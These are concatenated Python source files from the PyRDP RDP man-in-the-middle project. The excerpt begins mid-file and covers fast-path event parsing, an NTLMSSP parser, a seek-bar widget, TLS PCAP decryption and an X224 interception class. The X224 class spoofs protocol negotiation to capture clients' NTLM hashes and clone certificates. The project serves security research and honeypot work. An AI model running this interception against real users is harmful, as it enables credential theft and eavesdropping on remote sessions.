        return FastPathScanCodeEvent(eventHeader, scanCode, eventFlags & 1 != 0)

    def parseMouseEvent(self, eventHeader: int, stream: BytesIO) -> FastPathMouseEvent:
        pointerFlags = Uint16LE.unpack(stream)
        mouseX = Uint16LE.unpack(stream)
        mouseY = Uint16LE.unpack(stream)
        return FastPathMouseEvent(eventHeader, pointerFlags, mouseX, mouseY)

    def parseUnicodeEvent(self, eventHeader: int, stream: BytesIO) -> FastPathUnicodeEvent:
        released = eventHeader & 1 != 0
        text = stream.read(2)

        try:
            text = text.decode("utf-16le")
        except UnicodeError:
            pass

        return FastPathUnicodeEvent(text, released)

    def write(self, event: FastPathEvent) -> bytes:
        if isinstance(event, FastPathEventRaw):
            return event.data
        elif isinstance(event, FastPathScanCodeEvent):
            return self.writeScanCodeEvent(event)
        elif isinstance(event, FastPathMouseEvent):
            return self.writeMouseEvent(event)
        elif isinstance(event, FastPathUnicodeEvent):
            return self.writeUnicodeEvent(event)

        raise ValueError("Invalid FastPath event: {}".format(event))

    def writeScanCodeEvent(self, event: FastPathScanCodeEvent) -> bytes:
        stream = BytesIO()
        Uint8.pack(event.rawHeaderByte | int(event.isReleased), stream)
        Uint8.pack(event.scanCode, stream)
        return stream.getvalue()

    def writeMouseEvent(self, event: FastPathMouseEvent) -> bytes:
        stream = BytesIO()
        Uint8.pack(event.rawHeaderByte, stream)
        Uint16LE.pack(event.pointerFlags, stream)
        Uint16LE.pack(event.mouseX, stream)
        Uint16LE.pack(event.mouseY, stream)
        return stream.getvalue()

    def writeUnicodeEvent(self, event: FastPathUnicodeEvent):
        stream = BytesIO()
        Uint8.pack(int(event.released) | (FastPathInputType.FASTPATH_INPUT_EVENT_UNICODE << 5), stream)

        if isinstance(event.text, bytes):
            stream.write(event.text[: 2].ljust(2, b"\x00"))
        elif isinstance(event.text, str):
            stream.write(event.text[: 1].ljust(1, "\x00").encode("utf-16le"))

        return stream.getvalue()


class FastPathOutputParser(Parser):
    def __init__(self):
        super().__init__()
        self.bitmapParser = BitmapParser()

    def getEventLength(self, event: FastPathOutputEvent) -> int:
        if isinstance(event, bytes):
            header = Uint8.unpack(event[0])
            if self.isCompressed(header):
                return Uint16LE.unpack(event[2: 4]) + 4
            else:
                return Uint16LE.unpack(event[1: 3]) + 3

        size = 3

        if self.isCompressed(event.header):
            size += 1

        if isinstance(event, FastPathOrdersEvent):
            size += len(event.payload)
        elif isinstance(event, FastPathBitmapEvent):
            size += len(event.payload)
        elif isinstance(event, FastPathOutputEvent):
            length = len(event.payload) + 3
            if event.compressionFlags is not None:
                length += 1
            return length

        return size

    def isCompressed(self, header: int) -> bool:
        return (header >> 6) & FastPathOutputCompressionType.FASTPATH_OUTPUT_COMPRESSION_USED != 0

    def doParse(self, data: bytes) -> FastPathOutputEvent:
        """
        Parse TS_FP_UPDATE.

        https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/a1c4caa8-00ed-45bb-a06e-5177473766d3
        """
        stream = BytesIO(data)
        header = Uint8.unpack(stream)

        # https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/a1c4caa8-00ed-45bb-a06e-5177473766d3
        updateCode = header & 0xf
        # fragmentation = (header & 0b00110000) >> 4
        compressionFlags = Uint8.unpack(stream) if self.isCompressed(header) else None
        size = Uint16LE.unpack(stream)

        # Dispatch to the appropriate sub-parser.
        if updateCode == FastPathOutputType.FASTPATH_UPDATETYPE_BITMAP:
            return self.parseBitmapEventRaw(stream, header, compressionFlags, size)
        elif updateCode == FastPathOutputType.FASTPATH_UPDATETYPE_ORDERS:
            return self.parseOrdersEvent(stream, header, compressionFlags, size)

        read = stream.read(size)
        return FastPathOutputEvent(header, compressionFlags, read)

    def parseBitmapEventRaw(self, stream: BytesIO, header: int, compressionFlags: int, size: int) \
            -> FastPathBitmapEvent:
        return FastPathBitmapEvent(header, compressionFlags, [], stream.read(size))

    def parseBitmapEvent(self, fastPathBitmapEvent: FastPathOutputEvent) -> FastPathBitmapEvent:
        rawBitmapUpdateData = fastPathBitmapEvent.payload
        stream = BytesIO(rawBitmapUpdateData)
        Uint16LE.unpack(stream.read(2))  # updateType (unused)
        bitmapData = self.bitmapParser.parseBitmapUpdateData(stream.read())

        return FastPathBitmapEvent(fastPathBitmapEvent.header,
                                   fastPathBitmapEvent.compressionFlags,
                                   bitmapData,
                                   rawBitmapUpdateData)

    def writeBitmapEvent(self, stream: BytesIO, event: FastPathBitmapEvent):
        stream.write(event.payload)

    def parseOrdersEvent(self, stream: BytesIO, header: int, compressionFlags: int, size: int) -> FastPathOrdersEvent:
        """
        Parse the order events from a TS_FP_UPDATE_ORDERS.
        This is specified in MS-RDPEGDI.
        """
        payload = stream.read(size)
        assert len(payload) == size

        orders = FastPathOrdersEvent(header, compressionFlags, payload)
        return orders

    def writeOrdersEvent(self, stream, event):
        # Just write the saved raw bytes as-is.
        stream.write(event.payload)

    def write(self, event: FastPathOutputEvent) -> bytes:

        stream = BytesIO()
        Uint8.pack(event.header, stream)

        if event.compressionFlags is not None:
            Uint8.pack(event.compressionFlags if event.compressionFlags else 0, stream)

        updateStream = BytesIO()

        if isinstance(event, FastPathBitmapEvent):
            self.writeBitmapEvent(updateStream, event)
        elif isinstance(event, FastPathOrdersEvent):
            self.writeOrdersEvent(updateStream, event)
        else:
            # Means it's simply a FastPathOutputUpdateEvent, this needs to be the last elif.
            updateStream.write(event.payload)

        updateData = updateStream.getvalue()
        Uint16LE.pack(len(updateData), stream)
        stream.write(updateData)
        return stream.getvalue()


def createFastPathParser(tls: bool,
                         encryptionMethod: EncryptionMethod,
                         crypter: Union[RC4Crypter, RC4CrypterProxy],
                         mode: ParserMode) \
        -> Union[BasicFastPathParser, SignedFastPathParser, FIPSFastPathParser]:
    """
    Create a fast-path parser based on which encryption method is used.
    :param tls: whether TLS is used or not.
    :param encryptionMethod: the encryption method.
    :param crypter: the crypter for this connection.
    :param mode: the fast-path parser mode.
    """
    if tls:
        return BasicFastPathParser(mode)
    elif encryptionMethod in [EncryptionMethod.ENCRYPTION_40BIT,
                              EncryptionMethod.ENCRYPTION_56BIT,
                              EncryptionMethod.ENCRYPTION_128BIT]:
        return SignedFastPathParser(crypter, mode)
    elif encryptionMethod == EncryptionMethod.ENCRYPTION_FIPS:
        return FIPSFastPathParser(crypter, mode)
    else:
        raise ValueError("Invalid fast-path layer mode")



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from PySide6.QtWidgets import QWidget, QProgressBar
from PySide6.QtGui import QMouseEvent


class SeekBar(QProgressBar):
    """
    Progress bar widget that can be clicked to set the current progress.
    """

    def __init__(self, parent: QWidget = None):
        super().__init__(parent)
        self.setTextVisible(False)

    def setValue(self, p_int):
        QProgressBar.setValue(self, p_int)
        self.repaint()

    def mousePressEvent(self, event: QMouseEvent):
        progress = event.position().x() / self.width()
        value = int(progress * self.maximum())
        self.setValue(value)



#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from io import BytesIO
from typing import Callable, Dict

from pyrdp.core import ber, Uint8, Uint16LE, Uint32LE, Uint64LE
from pyrdp.exceptions import UnknownPDUTypeError, ParsingError
from pyrdp.parser.parser import Parser
from pyrdp.pdu import NTLMSSPChallengePayloadPDU, NTLMSSPTSRequestPDU, NTLMSSPChallengePDU, NTLMSSPAuthenticatePDU, \
    NTLMSSPNegotiatePDU, NTLMSSPPDU
from pyrdp.enum import NTLMSSPMessageType, NTLMSSPChallengeType, NTLMSSPChallengeVersion


class NTLMSSPParser(Parser):
    """
    Parser for NLA/NTLMSSP
    TODO: Add other fields to PDUs if necessary
    TODO: Implement write if necessary
    """

    def __init__(self):
        self.handlers: Dict[int, Callable[[bytes, BytesIO], NTLMSSPPDU]] = {
            1: self.parseNTLMSSPNegotiate,
            2: self.parseNTLMSSPChallenge,
            3: self.parseNTLMSSPAuthenticate
        }

    def findMessage(self, data: bytes) -> int:
        """
        Check if data contains an NTLMSSP message.
        Returns the offset in data of the start of the message or -1 otherwise.
        """
        return data.find(b"NTLMSSP\x00")

    def doParse(self, data: bytes) -> NTLMSSPPDU:
        sigOffset = self.findMessage(data)
        stream    = BytesIO(data[sigOffset:])
        signature = stream.read(8)
        messageType = Uint32LE.unpack(stream)
        return self.handlers[messageType](stream.getvalue(), stream)

    def parseField(self, data: bytes, fields: bytes) -> bytes:
        length = Uint16LE.unpack(fields[0: 2])
        offset = Uint32LE.unpack(fields[4: 8])

        if length != 0:
            return data[offset : offset + length]
        else:
            return b""

    def parseNTLMSSPNegotiate(self, data: bytes, stream: BytesIO) -> NTLMSSPNegotiatePDU:
        return NTLMSSPNegotiatePDU()

    def parseNTLMSSPChallenge(self, data: bytes, stream: BytesIO) -> NTLMSSPChallengePDU:
        workstationLen = Uint16LE.unpack(stream)
        workstationMaxLen = Uint16LE.unpack(stream)
        workstationBufferOffset = Uint32LE.unpack(stream)
        negotiateFlags = Uint32LE.unpack(stream)
        serverChallenge = stream.read(8)
        reserved = Uint64LE.unpack(stream)
        targetInfoLen = Uint16LE.unpack(stream)
        targetInfoMaxLen = Uint16LE.unpack(stream)
        targetInfoBufferOffset = Uint32LE.unpack(stream)
        version = Uint32LE.unpack(stream)
        reserved = stream.read(3)
        revisionCurrent = Uint8.unpack(stream)

        return NTLMSSPChallengePDU(serverChallenge)

    def parseNTLMSSPAuthenticate(self, data: bytes, stream: BytesIO) -> NTLMSSPAuthenticatePDU:
        lmChallengeResponseFields = stream.read(8)
        ntChallengeResponseFields = stream.read(8)
        domainNameFields = stream.read(8)
        userNameFields = stream.read(8)
        workstationFields = stream.read(8)
        encryptedRandomSessionKeyFields = stream.read(8)
        negotiationFlags = stream.read(4)
        version = stream.read(8)
        mic = stream.read(16)

        lmChallengeResponse = self.parseField(data, lmChallengeResponseFields)
        ntChallengeResponse = self.parseField(data, ntChallengeResponseFields)
        domain = self.parseField(data, domainNameFields).decode("utf-16le")
        user = self.parseField(data, userNameFields).decode("utf-16le")
        workstation = self.parseField(data, workstationFields)
        encryptedRandomSessionKey = self.parseField(data, encryptedRandomSessionKeyFields)

        proof = ntChallengeResponse[: 16]
        response = ntChallengeResponse[16 :]

        return NTLMSSPAuthenticatePDU(user, domain, proof, response)

    def parseNTLMSSPTSRequest(self, data: bytes, stream: BytesIO) -> NTLMSSPTSRequestPDU:
        if not ber.readUniversalTag(stream, ber.Tag.BER_TAG_SEQUENCE, True):
            raise UnknownPDUTypeError("Invalid BER tag (%d expected)" % ber.Tag.BER_TAG_SEQUENCE)

        length = ber.readLength(stream)
        if length > len(stream.getvalue()):
            raise ParsingError("Invalid size for TSRequest (got %d, %d bytes left)" % (length, len(stream.getvalue())))

        version = None
        negoTokens = None

        # [0] version
        if not ber.readContextualTag(stream, 0, True):
            return NTLMSSPTSRequestPDU(version, negoTokens, data)
        version = ber.readInteger(stream)

        # [1] negoTokens
        if not ber.readContextualTag(stream, 1, True):
            return NTLMSSPTSRequestPDU(version, negoTokens, data)
        ber.readUniversalTag(stream, ber.Tag.BER_TAG_SEQUENCE, True)  # SEQUENCE OF NegoDataItem
        ber.readLength(stream)
        ber.readUniversalTag(stream, ber.Tag.BER_TAG_SEQUENCE, True)  # NegoDataItem
        ber.readLength(stream)
        ber.readContextualTag(stream, 0, True)

        negoTokens = BytesIO(ber.readOctetString(stream))  # NegoData
        return NTLMSSPTSRequestPDU(version, negoTokens)

    def parseNTLMSSPChallengePayload(self, data: bytes, stream: BytesIO, workstationLen: int) -> NTLMSSPChallengePayloadPDU:
        workstation = stream.read(workstationLen)
        return NTLMSSPChallengePayloadPDU(workstation)

    def writeNTLMSSPChallenge(self, workstation: str, serverChallenge: bytes) -> bytes:
        stream = BytesIO()
        substream = BytesIO()

        workstation = workstation.encode('utf-16le')
        nameLen = len(workstation)
        pairsLen = self.writeNTLMSSPChallengePayload(substream, workstation)

        """
        CHALLENGE_MESSAGE structure
        https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/801a4681-8809-4be9-ab0d-61dcfe762786
        """
        substream.write(b'NTLMSSP\x00')
        Uint32LE.pack(NTLMSSPMessageType.CHALLENGE_MESSAGE, substream)
        Uint16LE.pack(nameLen, substream)
        Uint16LE.pack(nameLen, substream)
        Uint32LE.pack(NTLMSSPChallengeType.WORKSTATION_BUFFER_OFFSET, substream)
        Uint32LE.pack(NTLMSSPChallengeType.NEGOTIATE_FLAGS, substream)
        substream.write(serverChallenge)
        Uint64LE.pack(0, substream)
        Uint16LE.pack(pairsLen, substream)
        Uint16LE.pack(pairsLen, substream)
        Uint32LE.pack(NTLMSSPChallengeType.WORKSTATION_BUFFER_OFFSET + nameLen, substream)
        Uint8.pack(NTLMSSPChallengeVersion.NEG_PROD_MAJOR_VERSION_HIGH, substream)
        Uint8.pack(NTLMSSPChallengeVersion.NEG_PROD_MINOR_VERSION_LOW, substream)
        Uint16LE.pack(NTLMSSPChallengeVersion.NEG_PROD_VERSION_BUILT, substream)
        Uint8.pack(0, substream)
        Uint8.pack(0, substream)
        Uint8.pack(0, substream)
        Uint8.pack(NTLMSSPChallengeVersion.NEG_NTLM_REVISION_CURRENT, substream)

        self.writeNTLMSSPTSRequest(stream, NTLMSSPChallengeVersion.CREDSSP_VERSION, substream.getvalue())
        return stream.getvalue()

    def writeNTLMSSPTSRequest(self, stream: BytesIO, version: int, negoTokens: bytes):
        """
        Write NTLMSSP TSRequest for NEGOTIATION/CHALLENGE/AUTHENTICATION messages
        https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-cssp/6aac4dea-08ef-47a6-8747-22ea7f6d8685
        """
        negoLen = len(negoTokens)

        stream.write(ber.writeUniversalTag(ber.Tag.BER_TAG_SEQUENCE, True))
        stream.write(ber.writeLength(negoLen + 25))
        stream.write(ber.writeContextualTag(0, 3))
        stream.write(ber.writeInteger(version))  # CredSSP version
        stream.write(ber.writeContextualTag(1, negoLen + 16))
        stream.write(ber.writeUniversalTag(ber.Tag.BER_TAG_SEQUENCE, True))
        stream.write(ber.writeLength(negoLen + 12))
        stream.write(ber.writeUniversalTag(ber.Tag.BER_TAG_SEQUENCE, True))
        stream.write(ber.writeLength(negoLen + 8))
        stream.write(ber.writeContextualTag(0, negoLen + 4))
        stream.write(ber.writeOctetString(negoTokens))

    def writeNTLMSSPChallengePayload(self, stream: BytesIO, workstation: str) -> int:
        """
        Write CHALLENGE message payload and AV_PAIRS
        https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/801a4681-8809-4be9-ab0d-61dcfe762786
        https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/83f5e789-660d-4781-8491-5f8c6641f75e
        """
        length = len(workstation)

        stream.seek(NTLMSSPChallengeType.WORKSTATION_BUFFER_OFFSET)
        stream.write(workstation)

        pairsLen = stream.tell()
        Uint16LE.pack(NTLMSSPChallengeType.NTLMSSP_NTLM_CHALLENGE_AV_PAIRS_ID, stream)
        Uint16LE.pack(length, stream)
        stream.write(workstation)
        Uint16LE.pack(NTLMSSPChallengeType.NTLMSSP_NTLM_CHALLENGE_AV_PAIRS1_ID, stream)
        Uint16LE.pack(length, stream)
        stream.write(workstation)
        Uint16LE.pack(NTLMSSPChallengeType.NTLMSSP_NTLM_CHALLENGE_AV_PAIRS2_ID, stream)
        Uint16LE.pack(length, stream)
        stream.write(workstation)
        Uint16LE.pack(NTLMSSPChallengeType.NTLMSSP_NTLM_CHALLENGE_AV_PAIRS3_ID, stream)
        Uint16LE.pack(length, stream)
        stream.write(workstation)
        Uint16LE.pack(NTLMSSPChallengeType.NTLMSSP_NTLM_CHALLENGE_AV_PAIRS5_ID, stream)
        Uint16LE.pack(length, stream)
        stream.write(workstation)
        Uint16LE.pack(NTLMSSPChallengeType.NTLMSSP_NTLM_CHALLENGE_AV_PAIRS6_ID, stream)
        Uint16LE.pack(0, stream)
        pairsLen = stream.tell() - pairsLen
        stream.seek(0)

        return pairsLen




#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from scapy.layers.inet import TCP, IP
from scapy.layers.tls.crypto.pkcs1 import pkcs_i2osp
from scapy.layers.tls.handshake import TLSClientHello, TLSServerHello, TLSNewSessionTicket
from scapy.layers.tls.record import TLSApplicationData, TLS
from scapy.layers.tls.session import tlsSession
from scapy.plist import PacketList

from pyrdp.convert.PCAPStream import PCAPStream
from pyrdp.convert.utils import InetAddress, TCPFlags
from pyrdp.parser import TPKTParser


class TLSPDUStream(PCAPStream):
    """
    PDU stream for converting sessions that use TLS.
    """

    def __init__(self, client: str, server: str, packets: PacketList, masterSecret: str):
        """
        The session must have been obtained using by calling bind_layers(TCP, TLS) and then sniff(..., session=TCPSession).
        This connects the TCP and TLS layers and allows Scapy to reconstruct the TCP stream.
        """

        super().__init__(client, server)
        self.packets = packets
        self.masterSecret = masterSecret

    def __len__(self):
        return len(self.packets)

    def __iter__(self):
        return self.decryptTLSStream()

    def decryptTLSStream(self):
        """
        Generator function that decrypts an RDP stream that uses TLS.
        """

        tpktParser = TPKTParser()
        tls = None
        clientRandom = None
        serverRandom = None
        currentTimeStamp = None
        reconstructingRecord = False
        savedRecord = None
        savedPayload = b""
        tlsKeyGenerated = False

        for packet in self.packets:
            ip = packet.getlayer(IP)
            tcp = packet.getlayer(TCP)

            if len(tcp.payload) == 0 or tcp.flags & TCPFlags.PSH == 0:
                continue

            currentTimeStamp = packet.time
            currentSrcSocket = InetAddress(ip.src, tcp.sport)

            # The first couple messages don't use TLS. Check if it's one of those messages and output it as is.
            if hasattr(tcp, "load") and tpktParser.isTPKTPDU(tcp.load):
                yield PCAPStream.output(tcp.load, currentTimeStamp,
                                        currentSrcSocket,
                                        InetAddress(ip.dst, tcp.dport))
                continue

            # Create the TLS session context.
            if not tls:
                tls = tlsSession(
                    ipsrc=ip.src,
                    ipdst=ip.dst,
                    sport=tcp.sport,
                    dport=tcp.dport,
                    connection_end="server",
                )

            # Makes sure to reassemble TLS stream properly: client <-> server
            if currentSrcSocket != InetAddress(tls.ipsrc, tls.sport):
                tls = tls.mirror()

            # Pass every TLS message through our own custom session so the state is kept properly
            record = packet[TLS]
            record = TLS(bytes(record), tls_session=tls)

            for msg in record.msg:
                if isinstance(msg, TLSClientHello):
                    clientRandom = pkcs_i2osp(msg.gmt_unix_time, 4) + msg.random_bytes
                elif isinstance(msg, TLSServerHello):
                    # TODO: faced some cases where random_bytes was the right length already
                    #       but also it didn't entirely fix that case...
                    #if len(msg.random_bytes) == 32:
                    #    serverRandom = msg.random_bytes
                    #else:
                    serverRandom = pkcs_i2osp(msg.gmt_unix_time, 4) + msg.random_bytes
                elif isinstance(msg, TLSNewSessionTicket):
                    # Session established, set master secret.
                    tls.rcs.derive_keys(
                        client_random=clientRandom,
                        server_random=serverRandom,
                        master_secret=self.masterSecret,
                    )

                    tls.wcs.derive_keys(
                        client_random=clientRandom,
                        server_random=serverRandom,
                        master_secret=self.masterSecret,
                    )

                    tlsKeyGenerated = True
                elif isinstance(msg, TLSApplicationData):
                    yield PCAPStream.output(msg.data, currentTimeStamp,
                                            currentSrcSocket,
                                            InetAddress(ip.dst, tcp.dport))



#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from typing import Callable, Coroutine, Optional
from logging import LoggerAdapter

from pyrdp.core import defer
from pyrdp.enum import NegotiationFailureCode, NegotiationType, NegotiationRequestFlags, NegotiationProtocols
from pyrdp.layer import X224Layer
from pyrdp.mitm.state import RDPMITMState
from pyrdp.parser import NegotiationRequestParser, NegotiationResponseParser
from pyrdp.pdu import NegotiationRequestPDU, NegotiationResponsePDU, X224ConnectionConfirmPDU, X224ConnectionRequestPDU, \
    X224DisconnectRequestPDU, X224ErrorPDU, NegotiationFailurePDU


class X224MITM:
    def __init__(self, client: X224Layer, server: X224Layer, log: LoggerAdapter, state: RDPMITMState,
                 connector: Callable[[], Coroutine], disconnector: Callable[[], None],
                 startTLSCallback: Callable[[Callable[[], None]], None]):
        """

        :param client: X224 layer for the client side
        :param server: X224 layer for the server side
        :param log: logger for this component
        :param state: state of the MITM
        :param connector: function that connects to the server, called when a connection request is received
        :param disconnector: function that disconnects from the server, called when using a redirection host and NLA is enforced
        :param startTLSCallback: callback that should execute a startTLS on the client and server sides
        """

        super().__init__()
        self.client = client
        self.server = server
        self.log = log
        self.state = state
        self.connector = connector
        self.disconnector = disconnector
        self.startTLSCallback = startTLSCallback
        self.originalConnectionRequest: Optional[X224ConnectionRequestPDU] = None
        self.originalNegotiationRequest: Optional[NegotiationRequestPDU] = None

        self.client.createObserver(
            onConnectionRequest = self.onConnectionRequest,
            onDisconnectRequest = self.onClientDisconnectRequest,
            onError = self.onClientError
        )

        self.server.createObserver(
            onConnectionConfirm = self.onConnectionConfirm,
            onDisconnectRequest = self.onServerDisconnectRequest,
            onError=self.onServerError
        )

    def onConnectionRequest(self, pdu: X224ConnectionRequestPDU):
        """
        Log the connection cookie and handle connection protocols.
        :param pdu: the connection request
        """

        parser = NegotiationRequestParser()
        self.originalConnectionRequest = pdu
        self.originalNegotiationRequest = parser.parse(pdu.payload)
        self.state.requestedProtocols = self.originalNegotiationRequest.requestedProtocols

        # We assign clientIp here since this is fired before RDPMITM has the chance to update all loggers
        self.log.extra['clientIp'] = self.state.clientIp

        if self.originalNegotiationRequest.flags is not None and self.originalNegotiationRequest.flags & NegotiationRequestFlags.RESTRICTED_ADMIN_MODE_REQUIRED:
            self.log.warning("Client has enabled Restricted Admin Mode, which forces Network-Level Authentication (NLA)."
                             " Connection will fail.", {"restrictedAdminActivated": True})

        if self.originalNegotiationRequest.cookie:
            self.log.info("%(cookie)s", {"cookie": self.originalNegotiationRequest.cookie.decode()})
        else:
            self.log.info("No cookie for this connection")

        chosenProtocols = self.originalNegotiationRequest.requestedProtocols

        if chosenProtocols is not None:
            # Tell the server we only support the allowed authentication methods.
            chosenProtocols &= self.state.config.authMethods

        if self.state.ntlmCapture:
            # If we want to capture the NTLM hash, we need to put back CredSSP in here.
            # If we don't do that we will not get to the state where we can clone the certificate if needed.
            chosenProtocols = NegotiationProtocols.SSL | NegotiationProtocols.CRED_SSP

        modifiedRequest = NegotiationRequestPDU(
            self.originalNegotiationRequest.cookie,
            self.originalNegotiationRequest.flags,
            chosenProtocols,
            self.originalNegotiationRequest.correlationFlags,
            self.originalNegotiationRequest.correlationID,
        )

        payload = parser.write(modifiedRequest)
        defer(self.connectToServer(payload))

    async def connectToServer(self, payload: bytes):
        """
        Awaits the coroutine that connects to the server.
        :param payload: the connection request payload
        """

        await self.connector()
        self.server.sendConnectionRequest(payload = payload)

    def onConnectionConfirm(self, pdu: X224ConnectionConfirmPDU):
        """
        Execute a startTLS if the SSL protocol was selected.
        :param pdu: the connection confirm PDU
        """

        # FIXME: In case the server picks anything other than what we support, PyRDP is
        #        likely going to be unable to complete the handshake with the server.
        #        This should not happen since we are intercepting and spoofing the NEG_REQ,
        #        though.
        # protocols = NegotiationProtocols.SSL if self.originalRequest.tlsSupported else NegotiationProtocols.NONE

        parser = NegotiationResponseParser()
        response = parser.parse(pdu.payload)
        if isinstance(response, NegotiationFailurePDU):
            if response.failureCode == NegotiationFailureCode.HYBRID_REQUIRED_BY_SERVER:

                # Disconnect from current server
                self.disconnector()

                if self.state.canRedirect():
                    self.log.info("The server forces the use of NLA. Using redirection host: %(redirectionHost)s:%(redirectionPort)d", {
                        "redirectionHost": self.state.config.redirectionHost,
                        "redirectionPort": self.state.config.redirectionPort
                    })

                    # Use redirection host and replay sequence starting from the connection request
                    self.state.useRedirectionHost()
                else:
                    # If we are not configured to redirect then we should capture the NTLM hash
                    self.log.info("Server requires CredSSP/NLA and we are not configured to support it. Attempting to capture client's NTLM hashes.")
                    self.state.ntlmCapture = True

                self.onConnectionRequest(self.originalConnectionRequest)
                return
            else:
                self.log.info("The server failed the negotiation. Error: %(error)s", {"error": NegotiationFailureCode.getMessage(response.failureCode)})
                payload = pdu.payload
        elif self.state.ntlmCapture:
            payload = parser.write(NegotiationResponsePDU(NegotiationType.TYPE_RDP_NEG_RSP, 0x00, NegotiationProtocols.CRED_SSP))
        else:
            payload = parser.write(NegotiationResponsePDU(NegotiationType.TYPE_RDP_NEG_RSP, 0x00, response.selectedProtocols))

        # FIXME: This should be done based on what authentication method the server selected, not on what
        #        the client supports.
        if self.originalNegotiationRequest.tlsSupported:
            # If a TLS tunnel is requested, then we establish the server-side tunnel before
            # replying to the client, so that we can clone the certificate if needed.
            self.startTLSCallback(lambda: self.client.sendConnectionConfirm(payload, source=0x1234))
            self.state.useTLS = True
        else:
            self.client.sendConnectionConfirm(payload, source=0x1234)

    def onClientDisconnectRequest(self, pdu: X224DisconnectRequestPDU):
        self.server.sendPDU(pdu)

    def onServerDisconnectRequest(self, pdu: X224DisconnectRequestPDU):
        self.client.sendPDU(pdu)

    def onClientError(self, pdu: X224ErrorPDU):
        self.log.warn("X224 PDU Client Error %(pdu)s", {"pdu": pdu})
        self.server.sendPDU(pdu)

    def onServerError(self, pdu: X224ErrorPDU):
        self.log.warn("X224 PDU Server Error %(pdu)s", {"pdu": pdu})
        self.client.sendPDU(pdu)
